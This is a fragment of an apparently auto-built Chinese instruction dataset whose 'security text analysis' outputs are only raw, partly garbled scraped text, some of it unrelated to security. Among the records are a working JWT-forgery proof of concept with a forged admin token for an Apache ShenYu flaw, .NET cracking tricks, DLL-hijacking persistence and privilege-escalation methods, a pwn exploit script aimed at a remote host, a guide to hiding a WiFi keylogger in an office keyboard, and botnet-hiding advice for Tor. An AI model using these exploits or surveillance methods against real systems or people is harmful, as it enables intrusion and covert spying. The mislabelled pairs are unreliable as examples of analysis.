range(2000): for w in range(2000): image.ihdr.body.height = h image.ihdr.body.width = w if image.ihdr.is_crc_valid(): file_name = f\"result_{w}x{h}.png\" print(f\"Found a match, writing to {file_name}\") with open(file_name, \"wb\") as o: o.write(image.to_bytes()) ``` Output: ```console root@kali:/media/sf_CTFs/technion/Cool_Recovery_Concept# python3 solve.py Searching for width, height which will provide CRC value 0x831721d9 Found a match, writing to result_1328x995.png ``` The fix in the binary: ```console root@kali:/media/sf_CTFs/technion/Cool_Recovery_Concept# xxd -g 1 cool_recovery_concept.png | head -2 00000000: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 .PNG........IHDR 00000010: 00 00", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJon McCoy www.DigitalBodyGuard.com Hacking.NET Applications: The Black Arts Why .NET Countermeasures Skill Level Needed Will this work on every .NET application BACKGROUND How-To Attack .NET Applications Tools and Methodology of Attacking Overcome secure .NET Applications Building KeyGen/Crack/Hacks/Malware Reverse Engenerring for Protection THIS WILL COVER Attacking/Cracking IN MEM ||| ON DISK ATTACK OVERVIEW Attack on Disk Access Logic Debug Recompile Attack in Memory/Runtime Inject Target App Edit/Control Structure Decompile Infect Logic Hook Logic Navigate Structure Attack The Source Find the weak spot Subvert the Logic/State In Memory OR On Disk Control what you need Do your Reconnaissance ATTACKING ON DISK DEMO GrayWolf  IL_Spy  Reflector 101 - DECOMPILERS 101 - ATTACK ON DISK Decompile - Get code/tech Infect - Change the target's code Remold Application - WIN Exploit - Take advantage Connect/Open - Access Code THE WEAK SPOTS Flip The Check Set Value is True Cut The Logic Return True Access Value FLIP THE CHECK SET VALUE TO TRUE bool Registered = false; bool Registered = true; bool Registered = false; If(a!=b) If(a==b) If(a==b) RETURN TRUE bool IsRegistered() { Return TRUE; } RETURN TRUE bool IsValidKey(string x) { Return TRUE; } CUT THE LOGIC string sqlClean(string x) { Return x; } ACCESS VALUE bool ValidPassword(int x) { ShowKey(Pass); Return (x==Pass); } ATTACK SECURITY Microsoft Media Center CRACK PASSWORD CRACK PASSWORD Return True; CRACK DEMO REGISTRATION CHECK KeyGens Cracks CRACK THE KEY Public/Private 3/B==Name*ID*7 Call Server Demo = True; Complex Math == == == == == Complex Math Change Key ASK what is /B? Hack the Call Set Value 1% of the time the KeyGen is given PUBLIC/PRIVATE KEY If you can beat them Why join them Key = F5PA11JS32DA Key = 123456ABCDE SERVER CALL 1. Fake the Call 2. Fake the Request 3. Fake the Reply 4. Win Send SystemID = 123456789 *Registered = True* Reg Code = f3V541 REG CODE REPLAY Name: Code: == JON DOE 98qf3uy != *C 5G9P3 FAI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Linux Programming 高级 Linux 程序设计 卷 I 网址 http://www.AdvancedLinuxProgramming.com 译者 完美废人 网址 http://blog.csdn.net/Wolf0403 作者 Mark Mitchell Jeffrey Oldham Alex Samuel 高级 Linux 程序设计卷一Linux 平台上的高级 UNIX 编程 完美废人 译 谨以此书献给 四月 你是我生命中的奇迹 www.AdvancedLinuxProgramming.com 2 高级 Linux 程序设计卷一Linux 平台上的高级 UNIX 编程 完美废人 译 译者序 在 CSDN 论坛潜水多年看同学们讨论学习 C++ 的书籍的选择的时候总是对那 些经典大部头有种本能的恐惧我自己也是一样在学习 Linux 编程的开始时候我曾 在 Richard Stevens 的经典著作面前徘徊不前很幸运的有朋友向我推荐了这本 Advanced Linux Programming它内容浅显语言生动很快带领我进入了 Linux 程序设 计的殿堂之后再阅读 Stevens 等大师的著作也便不再显得生涩而困难 但是当我向其他朋友推荐这本书的时候却往往因为语言的关系而被婉拒这样 一本优秀的入门读物无法在广大以中文为母语的学生中无法普及实在是一件莫大的憾 事于是我就有了翻译这本书的念头 在这里我首先希望对原书的三位作者表示感谢感谢他们写了并以无私的精神免 费公开了这样一本优秀的技术书籍 其次我想感谢几位朋友为本书的翻译校对过程作出的贡献他们是CSDN 论 坛的无锋之刃猪头流氓标准 C 匪徒hellwolf老兵团的超越无限尤其感谢四月 可以说没有你就不会有这卷中文译本的诞生 译本与原书一样按照Open Publication License v1.0 发行OPL全文可以从 http://www.opencontent.org/openpub/ 找到欢迎将本书在网上复制分发但请保留原作 者与译者的版权信息如有平面媒体愿意出版或刊载本书的全部仅卷I或全书或部 分请与我联系 姓名高远 昵称完美废人 主页http://blog.csdn.net/Wolf0403 电子信箱wolf0403@hotmail.com 谢谢 www.AdvancedLinuxProgramming.com 3 高级 Linux 程序设计卷一Linux 平台上的高级 UNIX 编程 完美废人 译 Linux 系统中的高级 UNIX 编程 1 起步 2 编写优质 GNU/Linux 软件 3 进程 4 线程 5 进程间通信 www.AdvancedLinuxProgramming.com 4 高级 Linux 程序设计卷一Linux 平台上的高级 UNIX 编程 完美废人 译 第一章起步 本章将向你展示如何在 Linux 系统中完成一个 C/C++ 程序的基本步骤具体来说本 章讲解了如何在 Linux 系统中编辑 C 和 C++ 源码编译并调试得到的程序如果你已经对 Linux 环境下的程序编写相当熟悉则完全可以跳过本章内容直接开始阅读第二章编 写优质的 GNU/Linux 软件第二章中 2.3 节编写及使用程序库中包含了对静态和动态 库的比较这也许是你还不知道的内容值得关注 我们在编写本书的时候假定你已经对 C 或 C++ 程序设计语言以及标准 C 库的函数相 当熟悉除了为展示有关 C++ 独有的特性的情况时书中的示例代码均用 C 语言写就同 时我们还假定你知道如何在 Linux shell 中执行一些基本操作例如创建文件夹和复制文件 等因为许多 Linux 程序员都是在 Windows 环境下开始的编程我们会在一些时候特别指 出两个平台上的不同点 1.1 用 Emacs 进行编辑 编辑器editor是用于编辑代码的工具程序Linux 平台上有各种不同的编辑器但是 最流行的提供了最丰富特色的当属 GNU Emacs 了 关于 Emacs Emacs 决不仅仅是一个编辑器它是一个出奇强大的程序在 CodeSourcery 它被亲切地称为the One True Program 译者注记得 Matrix 里的 The One 吧_ 或者直接简称 OTP在 Emacs 中你可以查阅发送电子邮件你可以将 Emacs 进 行任意的定制与扩充可能性太多以至于不适合在这里进行讨论了你甚至可以 在 Emacs 中浏览网页 如果你熟悉其它的编辑器你当然可以选择使用它们本书中的任何内容都不会依赖 Emacs 的特性不过如果你仍然没有一个习惯使用的 Linux 下的编辑器那么你应该跟随 这篇不长的教程尝试学习一下 Emacs 的使用 如果你喜欢 Em", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPorosity Decompiling Ethereum Smart-Contracts Matt Suiche (@msuiche) Founder, Comae Technologies m@comae.io Whoami @msuiche Comae Technologies OPCDE - www.opcde.com First time in Vegas since BlackHat 2011 Mainly Windows-related stuff CloudVolumes (VMware App Volumes) Memory Forensics for DFIR (Hibr2Bin, DumpIt etc.) looks like such fun guy  TheShadowBrokers Didnt know much about blockchain before this project Just so you know We wont talk about POW/POS stuff We wont talk about Merkle Trees We wont talk about how to becoming a crypto-currency millionaire We will talk about the Ethereum EVM We will talk about Solidity We will talk about smart-contract bytecodes And yes, the tool isnt perfect  Agenda Ethereum Virtual Machine (EVM) Memory Management Addresses Call Types Type Discovery Smart-Contract Code Analysis Known Bugs Future Solidity Solidity the quality or state of being firm or strong in structure. But also the name of Ethereums smart-contracts compiler Porosity is the quality of being porous, or full of tiny holes. Liquids go right through things that have porosity. But also the name of Comaes smart-contract decompiler. Ethereum Virtual Machine (EVM) Account/Contract/Blockchain A Smart-Contract is made of bytecode stored in the blockchain. An address is a 160-bits value & corresponds to an account Operates 256-bits pseudo-registers EVM does not really have registers, but uses a virtual stack to replace them. Solidity & Smart Contracts Solidity compiles JavaScript-like code into Ethereum bytecode. contract Coin { // The keyword \"public\" makes those variables // readable from outside. address public minter; mapping (address => uint) public balances; // Events allow light clients to react on // changes efficiently. event Sent(address from, address to, uint amount); // This is the constructor whose code is // run only when the contract is created. function Coin() { minter = msg.sender; } function mint(address receiver, uint amount) { if (msg.sender != minter) retur", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSelf-Publishing and the Computer Underground DEFCON 15  4 August 2007 Myles Long Director of Depravity, CULT OF THE DEAD COW myles@cultdeadcow.com  http://www.cultdeadcow.com/ Christian RaD Man Wirth Founder, ACiD Productions; Member, cDcs Ninja Strike Force radman@acid.org  http://www.acid.org/ Rob Flack OHara Member, cDcs Ninja Strike Force flack@cdc-nsf.com  http://www.ninjastrikeforce.com/ copyright  2007 cDc communications 2 4 August 2007 Overview  Introduction  Background  Definition  Relevant Self-Published Works  Content  Investment  Publishing  Marketing  ROI  Accepting Payments  Reviews  Conclusion  Questions copyright  2007 cDc communications 3 4 August 2007 Introduction  Myles Long  Director of Depravity, CULT OF THE DEAD COW  Webmaster, cultdeadcow.com  Administrator, cDcs Bovine Dawn Dojo Forum  Editor and writer, CULT OF THE DEAD COW  Editor, The Book of Cao: Enlightenment through a Poke in the Eye (cDc communications, August 2006) copyright  2007 cDc communications 4 4 August 2007 Introduction  Christian Wirth, a.k.a. RaD Man  Founder, ACiD Productions  Member, cDcs Ninja Strike Force  Webmaster, acid.org  Organizer, Blockparty  a U.S. Demoparty  Interviewee, BBS: The Documentary  Editor/creator, Dark Domain DVD- ROM (ACiD Productions, 2005)  Owner, North American Distribution Rights to Freax Volume I: The History of the Computer Demoscene (CSW-Verlag/ACiD Productions, August 2005) copyright  2007 cDc communications 5 4 August 2007 Introduction  Rob OHara, a.k.a. Jack Flack  Member, cDcs Ninja Strike Force  Webmaster, ninjastrikeforce.com  Reviewer, Videogame Collector magazine and the Digital Press zine  Moderator/administrator/feature writer, Digital Press (digitpress.com)  Writer, IGN.com, 2600: The Hacker Quarterly, CULT OF THE DEAD COW, TheLogBook.com  Contributing author, Retro Gaming Hacks (OReilly, October 2005)  Author, Commodork (Rob OHara Books, September 2006) copyright  2007 cDc communications 6 4 August 2007 What do all of these publica", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 针对Dynamic Link Library(DLL)攻击法的深 分析 1.Dynamic Link Library基础知识 1.1.DLL的结构 1.2加载DLL 1.2.1显式加载 1.2.2隐式加载 1.3.win常dll及其功能简介 1.4.DLL如何加载 2.DLL劫持可能发的个场景 2.1.场景1:可以直接劫持某个应的DLL 2.2.场景2:不存在DLL 劫持 2.3.场景3:DLL 搜索顺序劫持 2.4.其他 3.常的DLL攻击利法 3.1.DLL 加载劫持进钓维权 3.1.1.实例1 Qbot(名 Qakbot 或 Pinkslipbot)劫持Calc.exe的WindowsCodecs.dll 3.1.2.实例2 Kaseya 劫持MsMpEng.exe的mpsvc.dll 3.1.3.实例3 LuminousMoth APT劫持多个DLL进利 3.1.4.实例4 ChamelGang APT 劫持MSDTC进维权 3.1.5.实例5 利劫持Update.exe的CRYPTSP.dll进维权 3.2.DLL 加载劫持进提权 3.2.1 劫持任务计划程序服务加载的WptsExtensions.dll通过 PATH 环境变量进提权 3.2.2.通过PrivescCheck检测标上是否存在DLL劫持 3.2.3.劫持winsat.exe的dxgi.dll Bypass UAC 3.3.DLL 加载劫持进终端杀软强对抗 3.3.1.实例1 劫持360杀毒 3.3.2.实例2 劫持卡巴斯基的wow64log.dll 4.部分使DLL 劫持的APT 2 5.参考 by-空对抗中-李国聪 dll(dynamic-link library),动态链接库是微软实现共享函数库的种式动态链接就是把些常 的函数代码制作成dll件当某个程序调到dll中的某个函数的时候windows系统才把dll加载到内存 中也就是说当程序需要的时候才链接dll所以是动态链接 简单的说dll有以下个优点 1) 节省内存同个软件模块若是以源代码的形式重则会被编译到不同的可执程序中同时运 这些exe时这些模块的进制码会被重复加载到内存中如果使dll则只在内存中加载次所有使 该dll的进程会共享此块内存当然像dll中的全局变量这种东是会被每个进程复制份的 1.Dynamic Link Library基础知识 动态连接就是把这些相通的功能函数都放到种特殊形式的windwos可执件中dll成 个DLL的时候程序员需要写出其中包含那些函数需由其他程序来访问这个过程叫做对函数的导 出 创建windows程序的时候专的连接程序对程序的对象件进扫描并成个列表列出那些调 的函数在那个DLL那个位置指定各个函数所在位置的过程叫做对函数的导 当程序运的时候旦要求到执件内部没有的函数windows就会动装载动态连接库使应 程序可以访问这些函数此时每个函数的地址都会解析出来并且以动态的式连接到程序 这便是术语动态连接的由来 另外还有个好处就是当你更新你的这个函数的版本和功能的时候静态连接所需要做的作是多少 假设按windwos来说他有上千个这样的函数共有100多个程序来使那静态连接需要100000次 的更新动态连接只需要1000次从也节省了内存的空间 动态连接库不定是DLL扩展名的也可以是ocxvbxexedrv 等等的 3 2) 不需编译的软件系统升级若个软件系统使了dll则该dll被改变函数名不变时系统升级只 需要更换此dll即可不需要重新编译整个系统事实上很多软件都是以这种式升级的例如我们经 常玩的星际魔兽等游戏也是这样进版本升级的 3) Dll库可以供多种编程语使例如c编写的dll可以在vb中调这点上DLL还做得很不够因 此在dll的基础上发明了COM技术更好的解决了系列问题 包含objbase.h头件持COM技术的个头件windows.H也可以 然后是个DllMain函数 1.1.DLL的结构 #include <objbase.h> #include <iostream.h> BOOL APIENTRY DllMain(HANDLE hModule, DWORD dwReason, void* lpReserved) { HANDLE g_hModule; switch(dwReason) { case DLL_PROCESS_ATTACH: cout<<\"Dll is attached!\"<<endl; g_hModule = (HINSTANCE)hModule; break; case DLL_PROCESS_DETACH: cout<<\"Dll is detached!\"<<endl; g_hModule=NULL; break; } return tru", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMalicious Proxies The Webs Evil Twin Introducing Doppelganger Introduction  Who am I?  Security field since 1998 IDS Pen testing Malicious logic analysis Incident response (c) 2009 Edward J. Zaborowski 4  Focusing on HTTP proxies  Plenty of reasons to legitimately deploy a proxy  Save bandwidth  Filtering of sites  etc Proxies (c) 2009 Edward J. Zaborowski 5 WHO CARES!? Why a Malicious Proxy  Come up with as many nefarious ways to distort a users interaction as I can  Quickly & easily gather potentially useful information Proxies: Standard  Client requests a page through proxy  Proxy request the page from the server  Server sends the response to the proxy  Proxy serves the page to the client (c) 2009 Edward J. Zaborowski 7 Proxies: Malicious  Similar to a standard proxy, but the data can be modified (c) 2009 Edward J. Zaborowski 8 Proxies: Malicious Cont.  Not much different from a standard proxy  Captures & modifies HTTP responses & requests  Change the response adding HTML or JavaScript (c) 2009 Edward J. Zaborowski 9 Malicious Proxies: Modifying Content  Modify static HTML  Cumbersome  Need a lot of customization  Inject JavaScript  Considerably easier  find something all pages (should) have: a <head> tag  JavaScript can modify the DOM in a consistent way, alleviating major customization (c) 2009 Edward J. Zaborowski 10 Malicious Proxies: Potential Issues  Inserted JavaScript may be blocked (NoScript)  Some AJAX heavy sites dont play well  Most sites use HTTP/1.1 compressed pages  Decompress & modify  Strip the compression header in the request  Modifying the page slows down delivery  Use JavaScript to let the client make the changes, saving the proxys CPU (c) 2009 Edward J. Zaborowski 11 Proxies: Assigning a proxy  Statically  Tedious and not very feasible/easy  Dynamically via DNS, or DHCP  DNS (WPAD Record)  DHCP Option 252  Only works with browsers set to use auto-proxy detection  Others (c) 2009 Edward J. Zaborowski 12 Doppelganger: Goals  Personal  Learning", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Sublime 编辑器 --- ### 简介 Sublime Text 是一个代码编辑器Sublime Text 3是收费软件但可以无限期试用 Sublime 支持多种编程语言的语法高亮拥有优秀的代码自动完成功能还拥有代码片段Snippet 的功能可以将常用的代码片段保存起来在需要时随时调用 ### 安装 window下百度搜索 `sublime` 进行下载安装 ### 插件 #### 安装 `Package Control` 按 **Ctrl+`** 调出console 粘贴下面安装代码到底部命令行并回车 > import urllib.request,os,hashlib; h = 'df21e130d211cfc94d9b0905775a7c0f' + '1e3d39e33b79698005270310898eea76'; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); by = urllib.request.urlopen( 'http://packagecontrol.io/' + pf.replace(' ', '%20')).read(); dh = hashlib.sha256(by).hexdigest(); print('Error validating download (got %s instead of %s), please try manual install' % (dh, h)) if dh != h else open(os.path.join( ipp, pf), 'wb' ).write(by) 重启Sublime Text 3 如果在Perferences->package settings中看到package control这一项则安装成功 可以到 [官网链接](https://packagecontrol.io/) 复制代码或下载 `Package Control.sublime-package` 放到 `sublime` 安装目录里的 `data` 里 `installed package` 文件夹这个文件夹位置可能会不一样 #### 用Package Control安装其他插件 **第一种方法**按下Ctrl+Shift+P调出命令面板输入install 点击 Install Package 选项然后在列表中搜索并选中要安装的插件 **第二种方法**点击工具栏`Preferences`下的`Package Control`然后搜索并选中要安装的插件 #### 常用插件 **Package Control**插件包控制插件 安装SublimeText后必须安装的东西插件包控制插件 可以控制插件的查看已安装差价安装升级删除等操作 **ChineseLocalization** 汉化插件 工具栏 Help 下的 Language 选项选择语言 **Emmet** 自动补齐插件 输入简写按Tab键可触发效果 **Babel**React JSX 具有React JSX扩展名的ES6 JavaScript的语法定义语法高亮 **Agila**主题 一款受欢迎的sublime Theme ### 快捷键 #### 配置代码片段 首先点击`Tools` -> `New Snippet` 显示代码如下 ```html <snippet> <content><![CDATA[ Hello, ${1:this} is a ${2:snippet}. ]]></content> <!-- Optional: Set a tabTrigger to define how to trigger the snippet --> <!-- <tabTrigger>hello</tabTrigger> --> <!-- Optional: Set a scope to limit where the snippet will trigger --> <!-- <scope>source.python</scope> --> </snippet> ``` ##### 模板说明 ```html <snippet> <content><![CDATA[ 你需要插入的代码片段${1:name} ]]></content> <!-- 可选快捷键利用Tab自动补全代码的功能 --> <tabTrigge", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Brave Browser date: 2022-11-23 16:23:31.698868 background: bg-[#da6b37] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 64 keyboard shortcuts found in the Brave browser --- Keyboard Shortcuts {.cols-2} ------------------ ### Tabs and Windows Shortcut | Action ---|--- `Ctrl` `N` | Open a new window `Ctrl` `Shift` `N` | Open a new window in Private mode `Ctrl` `T` | Open a new tab, and jump to it `Ctrl` `Shift` `T` | Reopen the last closed tab, and jump to it `Ctrl` `Tab` | Jump to the next open tab `Ctrl` `Shift` `Tab` | Jump to the previous open tab `Ctrl` `1-8` | Jump to a specific tab `Ctrl` `9` | Jump to the last tab `Alt` `Home` | Open your home page in the current tab `Ctrl` `Left` | Open the previous page from your browsing history in the current tab `Alt` `Right` | Open the next page from your browsing history in the current tab `Ctrl` `W` | Close the current tab `Ctrl` `Shift` `W` | Close the current window `Alt` `Space` `N` | Minimize the current window `Alt` `Space` `X` | Maximize the current window `Alt` `F4` | Close the current window `Ctrl` `Shift` `Q` | Quit Brave {.shortcuts} ### Browser Shortcut | Action ---|--- `Alt` `F` | Open the main menu `Ctrl` `Shift` `B` | Show or hide the bookmarks bar `Ctrl` `H` | Open the history page in a new tab `Ctrl` `J` | Open the downloads page in a new tab `Shift` `Esc` | Open the Brave task manager `Shift` `Alt` `T` | Set focus on the first item in the toolbar `F10` | Set focus on the last item in the toolbar `F6` | Switch focus to unfocused dialog, if showing `Ctrl` `F` | Open the find bar to search the current page `Ctrl` `G` | Jump to the next match in your find bar search `Ctrl` `Shift` `G` | Jump to the previous match in your find bar search `Ctrl` `Shift` `J` | Open developer tools `Ctrl` `Shift` `Delete` | Open the clear browser data options `F1` | Open the Brave help center in a new tab `Ctrl` `Shift` `M` | Open profile menu `` | {.shortcuts} ### Address Bar", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HID-KeyboardLogger > 文章作者 [Sarah-Briggs](https://github.com/Sarah-Briggs) & [Atomic-Crash](https://github.com/Atomic-Crash) & [r0fus0d](https://github.com/No-Github) <p align=\"center\"> <img src=\"../../../../../assets/img/banner/HID-KeyboardLogger.jpg\"> </p> --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **文章/教程** - [手把手教你DIY一个硬件键盘记录器](https://www.freebuf.com/geek/241398.html) **资源** - [spacehuhn/wifi_keylogger](https://github.com/spacehuhn/wifi_keylogger) --- ## 简介 基于上一次Usbkeylogger(无线键盘记录器)的制作我们发现了一些使用时的不便或者说是还有可改进的方面(指隐蔽性)本次就针对上一次的DIY进行升级将其直接和使用载体键盘合为一体 如果说在一般环境下在他人的键盘到主机之间插上一个形如优盘的硬件看起来很可疑尤其是输入设备的USB接口在主机正前方或者主机的USB接口处不那么\"隐蔽\"的 像在这种环境下你拿这个奇形怪状的记录器去插别人的主机或者笔记本电脑实在是有点明显 考虑到并不人人都是机械键盘爱好者大多数普通人对于电脑的键盘是不那么敏感的所以我们干脆将无线键盘记录器植入一把普通的不能再普通的办公键盘 质朴的商务黑加上它天真无邪的外形几乎和学校的微机室单位员工电脑甚至企业机房里的键盘都没有太大区别 将无线键盘记录器集成在它内部线路板上不仅可以完美将其隐藏在键盘内部最重要的是可以利用键盘外壳作为掩护给记录器本体加装增益天线可大幅度加快连接速度和范围 --- ## 制作过程 ### 键盘改装设计 首先是键盘主体部分这里我们选作示例的是一款联想品牌的SK-8827办公键盘无论颜色还是造型它的外观和大多数普通电脑用户的键盘基本一致让人没有任何怀疑它的理由 将其拆开就可以看到它的内部结构了本设计主要做改线所以这里的展示只需要看右上角的那块矩形电路板 键盘记录器的输入端和输出端是USB公母头我们可以改变其电路走线重新焊接使记录器整体可以藏在外壳里并且保持键盘原来的出线(在实际改装中各品牌各型号的键盘内部走线都有所区别因此这里不给出本次具体的接线电路图) 最后将整个成品成功嵌入键盘 --- ### 加装天线 在本次的改良中天线部分是提升性能的关键 原先的无线键盘记录器的工作有效范围大约只有3~5米并且连接其wifi热点的速度有些堪忧(有时可以秒连也可能卡在\"正在获取IP地址\"最长达1分钟) 通过加装合适的增益天线现已将其有效工作范围提升至50米对你没听错是50米是原先的10倍增长而且就算拉到50米处wifi信号才只是减少了仅一格并且基本不影响数据接收的速度 这里说的天线当然不是那种体型巨大的金属支架经过我们多次拆换调试最终找到了一款只有牙签大小且完美适配的增益天线 这是一款FPC材质的双频软天线生产商是广东的一家小作坊故没有具体品名及型号 PFC即 Flexible Printed Circuit (柔性印刷电路板)所挑选的这一款的PFC背部有软胶可以粘附在附近的物体上以达到固定方向稳固不易摇晃的辅助作用 该天线的增益量为3~8dbidBi是功率增益的单位是一个相对值dBi的参考基准为全方向性天线(可近似理解成是一个圈状范围)这里只叙述本天线的实际应用不过多介绍原理等相关内容 将天线的底座和记录器的CPUESP8266的外置天线端口对接: 由于记录器本身的体积不大就算接上这款增益天线后还是可以将它们一起轻松内置在键盘内部 注意这里红圈处就是内嵌的天线 最后按孔贴回导电薄膜和软胶垫合上塑料外壳将螺丝拧好完美 那么现在这把看似平平无奇人畜无害的键盘就成了一款\"杀人不见血\"的HID攻击利器任何人使用这把键盘在主机上的一切按键操作都将可以被最远在50米处的攻击者悄悄记录 由于它本身朴素的造型很难吸引使用者的目光几乎无法引起目标的怀疑 --- ## 使用 - https://www.youtube.com/watch?v=Vi3oBdMW3lU", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResilient Botnet Command and Control with Tor Dennis Brown July 2010 Introduction  Who am I?  Work for Tenable Network Solutions  Spoken previously at Toorcon, PaulDotCom Podcast  Run Rhode Island's Defcon Group DC401 Doesn't it suck when your botnet gets shut down?  Lots of time lost  Setting up servers  Building the bot  Crypting  Spreading  Seeding bad Torrents takes time  Setting up drive-by downloads takes more time  Lots of money lost  Could be spending that time reselling, DDoSing, etc. How do botnets get taken down?  Common methods include  Hosting provider de-peered  Example: McColo, Troyak  Server hosting botnet cleans up/kicks off  Public IRC servers, free web hosting  Compromised host cleaned up/rebuilt  DNS Revoked  IP of C&C server banned  Because Metus pwnz and I open a port on my router at home just like the tutorial told me! Wouldn't it be great if we had a way to host these things with less risk of take down? We do. Its called Tor. I Really Like Tor  Tor isn't bad, but people who use it can be  Most people that use it aren't (I hope!)  The capacity for devastating abuse with Tor is huge  Anonymity is King  How anonymous is Tor?  Recap research about beating Tor's anonymity  Hey, it's good enough for WikiLeaks, right? How does Tor help us hide our botnets?  Hidden Services  Every bot master's dream!  Authenticated Hidden Services!  Private Tor Networks  Exit Node Flooding  Come at a price  Speed  Ease of Control HTTP Hidden Service HTTP Hidden Service  Very basic, very effective  What is a Hidden Service?  Standard feature of Tor  Insert Diagrams, etc  Works behind NAT, Firewalls, etc.  No need to expose services to the network  We can use this to our advantage to stay hidden  Hence the name So I have a Zeus botnet...  Easy to get running  LAMP server running pretty much anywhere  Watch out for data leakage revealing your IP!  Zeus Control Panel running on this server  Watch out for poorly written control panels!  Configure a Hidden Service for the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2021-37580-apacheshenyuadmin 漏洞 Apacheshenyuadmin-jwt越权漏洞通过伪造jwt获取管理员 漏洞成因 硬编码jwtkey 1. 只解析了jwttoken的内容并没有针对其内容进判断 2. 影响版本 shenyuv2.3.0-v2.4.0 漏洞分析 直接在权限校验处打上断点 org/apache/shenyu/admin/shiro/config/ShiroRealm.AuthenticationInfo getCredential会获取header头内的token并返还然后代码会判断token是否有值 如果有就会进getUserInfoByToken法 org/apache/shenyu/admin/shiro/config/ShiroRealm.java-getUserInfoByToken 这把token传到了getIssuer法内 跟进此法先解码jwt之后返回jwt解码后到username字段到值 继续向下之后就是根据usernmae查找判断是否存在此如果没有则返回usernamecan notbefound 如果存在则返回查找到的信息 在这套流程中并没有针对jwt的key进校验 Shenyu-admin获取token的字段 org/apache/shenyu/admin/shiro/bean/StatelessAuthFilter.java-StatelessAuthFilter内 漏洞利 poc Python import jwt def generateToken(username): headers = { \"alg\": \"HS256\", \"typ\": \"JWT\" } # 设置headers即加密算法的配置 salt = \"\" # 随机的salt密钥只有token成者同时也是校验者能有于校验成的token是 否合法 payload = { \"userName\": username, } token = jwt.encode(payload=payload, key=salt, algorithm='HS256', headers=headers) return token print(generateToken(\"admin\")) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 传名拿到该的token然后设置header头X-Access-Token:XXXXX即获得管理员权 限 根据分析可以得知代码本只需要jwt内payload的username所以sign为空也是可以绕过权限 Apache eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIn0. 1 EXP: https://github.com/fengwenhua/CVE-2021-37580", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Marinated Salad Category: Cryptography ## Description > Excuse me waiter, P Dvbsk sprl h Jhlzhy Zhshk dpao > > okarozuvaf{C1tqF3y3_f0dJf_v_Y34F_c1a4uYy3Gfw_wy3MKl} ## Solution If we run `\"P Dvbsk sprl h Jhlzhy Zhshk dpao okarozuvaf{C1tqF3y3_f0dJf_v_Y34F_c1a4uYy3Gfw_wy3MKl}\"` through ROT-19, we get: ```console root@kali:/media/sf_CTFs/technion/Marinated_Salad# export NODE_PATH=$(npm root --quiet -g) root@kali:/media/sf_CTFs/technion/Marinated_Salad# node > const chef = require(\"cyberchef\"); undefined > chef.ROT13(\"P Dvbsk sprl h Jhlzhy Zhshk dpao okarozuvaf{C1tqF3y3_f0dJf_v_Y34F_c1a4uYy3Gfw_wy3MKl}\", [true, true, 19]) I Would like a Caesar Salad with hdtkhsnoty{V1mjY3r3_y0wCy_o_R34Y_v1t4nRr3Zyp_pr3FDe} ``` This means that the two part of the sentence are encrypted with different ciphers. ROT ciphers are often called \"Caesar cipher\". From [Wikipedia](https://en.wikipedia.org/wiki/Caesar_cipher): > The encryption step performed by a Caesar cipher is often incorporated as part of more complex schemes, such as the Vigenère cipher, and still has modern application in the ROT13 system. Caesar salad are often served with vinaigrette, which sounds like Vigenère. So without doubt the seconds part of the ciphertext must be encoded with a Vigenère cipher. After some trial an error with Vigenère ciphers, `hdtkhsnoty{V1mjY3r3_y0wCy_o_R34Y_v1t4nRr3Zyp_pr3FDe}` we find the cipher key and decrypted message: ```console > chef.vigenèreDecode(\"hdtkhsnoty{V1mjY3r3_y0wCy_o_R34Y_v1t4nRr3Zyp_pr3FDe}\", [\"flag\"]) cstechnion{V1geN3r3_s0rRy_i_M34N_v1n4iGr3Tte_pl3ASe} ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nByteCTF WriteUp by Nu1L Author: Nu1L ByteCTF WriteUp by Nu1L PWN easyheap gun Misc Double Game PT Site survey checkin WEB douyin_video jvav Reverse QIAO DaShen Decode AES CrackMe PWN easyheap from pwn import * # s = process(\"./easyheap\",env={'LD_PRELOAD':\"./libc-2.31.so\"}) # s = process(\"./easyheap\") s = remote(\"123.56.96.75\",\"30774\") libc = ELF(\"./libc-2.31.so\") context.terminal = ['notiterm', '-t', 'iterm', '-e'] def add(size1,size2,buf): s.sendlineafter(\">>\",\"1\") s.sendlineafter(\"Size: \",str(size1)) if size1 <= 0 or size1 > 128: s.recvuntil(\"Invalid size.\") s.sendlineafter(\"Size: \",str(size2)) s.sendafter(\"Content: \",buf) def show(idx): s.sendlineafter(\">>\",\"2\") s.sendlineafter(\"Index: \",str(idx)) def free(idx): s.sendlineafter(\">>\",\"3\") 